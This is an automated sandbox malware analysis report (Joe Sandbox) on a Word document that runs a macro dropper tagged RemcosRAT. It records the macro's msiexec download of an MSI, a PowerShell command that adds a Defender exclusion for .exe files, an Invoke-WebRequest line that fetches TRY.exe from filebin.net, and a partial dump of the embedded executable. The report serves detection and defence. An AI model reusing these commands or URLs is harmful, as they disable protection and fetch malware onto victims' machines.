Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Sample Name:12543_0008858249_FWDOUTSTANDING_20200604.doc
Analysis ID:611840
MD5:090e1dfdcbf2185788ea14cd113cc39f
SHA1:6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
Tags:docRemcosRAT
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
Document contains OLE streams with PE executables
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Sigma detected: Cabinet File Expansion
Potential document exploit detected (performs DNS queries)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Sigma detected: Msiexec Initiated Connection
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3036 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • msiexec.exe (PID: 2996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
    • msiexec.exe (PID: 464 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
      • icacls.exe (PID: 1436 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
      • expand.exe (PID: 1156 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F)
      • TRY.exe (PID: 2272 cmdline: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)
        • cmd.exe (PID: 1136 cmdline: cmd /c thai.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • powershell.exe (PID: 1988 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • powershell.exe (PID: 2672 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • icacls.exe (PID: 2068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
  • rundll32.exe (PID: 2840 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
12543_0008858249_FWDOUTSTANDING_20200604.docSUSP_Doc_WindowsInstaller_Call_Feb22_1Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.Nils Kuhnert
  • 0xe039:$: WindowsInstaller.Installer$
  • 0xec0b:$: CreateObject
  • 0xec36:$: InstallProduct
12543_0008858249_FWDOUTSTANDING_20200604.docOffice_AutoOpen_MacroDetects an Microsoft Office file that contains the AutoOpen Macro functionFlorian Roth
  • 0xe1f3:$s1: AutoOpen
  • 0xebee:$s1: AutoOpen
  • 0xd500:$s2: Macros

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmpSUSP_Doc_WindowsInstaller_Call_Feb22_1Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.Nils Kuhnert
  • 0x1039:$: WindowsInstaller.Installer$
  • 0x1f0b:$: CreateObject
  • 0x1f36:$: InstallProduct
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMPSUSP_Doc_WindowsInstaller_Call_Feb22_1Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.Nils Kuhnert
  • 0x24a5:$: WindowsInstaller.Installer$
  • 0x23c6:$: CreateObject
  • 0x4b64:$: CreateObject
  • 0x4ce0:$: CreateObject
  • 0x4d1e:$: CreateObject
  • 0x5743:$: CreateObject
  • 0x4d54:$: InstallProduct
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0x3648:$s1: \Common Files\Microsoft Shared\
  • 0x2111:$s2: Scripting.FileSystemObject
  • 0x2470:$a3: AutoOpen
  • 0x4b36:$a3: AutoOpen
  • 0x4d30:$a3: AutoOpen
  • 0x5766:$a3: AutoOpen

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process startedAuthor: Bhabesh Raj: Data: Command: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\expand.exe, NewProcessName: C:\Windows\SysWOW64\expand.exe, OriginalFileName: C:\Windows\SysWOW64\expand.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, ProcessId: 1156, ProcessName: expand.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.47.40.36, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 2996, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", ProcessId: 2672, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ProcessId: 2272, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", ProcessId: 1988, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , ProcessId: 2272, ProcessName: TRY.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docVirustotal: Detection: 37%Perma Link
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docReversingLabs: Detection: 24%
Antivirus detection for URL or domain
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msiAvira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.exeAvira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: filebin.netVirustotal: Detection: 5%Perma Link
Machine Learning detection for sample
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB62E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,
Source: unknownHTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknownHTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:
Source: C:\Windows\System32\msiexec.exeFile opened: x:
Source: C:\Windows\System32\msiexec.exeFile opened: v:
Source: C:\Windows\System32\msiexec.exeFile opened: t:
Source: C:\Windows\System32\msiexec.exeFile opened: r:
Source: C:\Windows\System32\msiexec.exeFile opened: p:
Source: C:\Windows\System32\msiexec.exeFile opened: n:
Source: C:\Windows\System32\msiexec.exeFile opened: l:
Source: C:\Windows\System32\msiexec.exeFile opened: j:
Source: C:\Windows\System32\msiexec.exeFile opened: h:
Source: C:\Windows\System32\msiexec.exeFile opened: f:
Source: C:\Windows\System32\msiexec.exeFile opened: b:
Source: C:\Windows\System32\msiexec.exeFile opened: y:
Source: C:\Windows\System32\msiexec.exeFile opened: w:
Source: C:\Windows\System32\msiexec.exeFile opened: u:
Source: C:\Windows\System32\msiexec.exeFile opened: s:
Source: C:\Windows\System32\msiexec.exeFile opened: q:
Source: C:\Windows\System32\msiexec.exeFile opened: o:
Source: C:\Windows\System32\msiexec.exeFile opened: m:
Source: C:\Windows\System32\msiexec.exeFile opened: k:
Source: C:\Windows\System32\msiexec.exeFile opened: i:
Source: C:\Windows\System32\msiexec.exeFile opened: g:
Source: C:\Windows\System32\msiexec.exeFile opened: e:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global trafficDNS query: name: filebin.net
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: Joe Sandbox ViewASN Name: REDPILL-LINPRORedpillLinproNO REDPILL-LINPRORedpillLinproNO
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewIP Address: 87.238.33.8 87.238.33.8
Source: Joe Sandbox ViewIP Address: 185.47.40.36 185.47.40.36
Source: unknownHTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknownHTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: ~DFECA159C20646BB57.TMP.2.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/
Source: expand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
Source: ~DFECA159C20646BB57.TMP.2.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470
Source: 535fae.ipi.2.drString found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: filebin.net
Source: global trafficHTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: filebin.net
Source: global trafficHTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: situla.bitbit.net

System Summary

barindex
Document contains OLE streams with names of living off the land binaries
Source: MSI5B5A.tmp.2.drStream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ ..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H
Document contains OLE streams with PE executables
Source: MSI5B5A.tmp.2.drStream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: MSI5B5A.tmp.2.drStream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLEMatched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLEMatched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, type: DROPPEDMatched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPEDMatched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\535fae.ipiJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5B5A.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB665B0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB63E4C
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61C38
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB65940
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB66028
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB633C0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61B44
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB62B24
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 289 bytes, 1 file
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MSI5B5A.tmp.2.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 535fae.ipi.2.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE indicator, VBA macros: true
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77740000 page execute and read and write
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docVirustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docReversingLabs: Detection: 24%
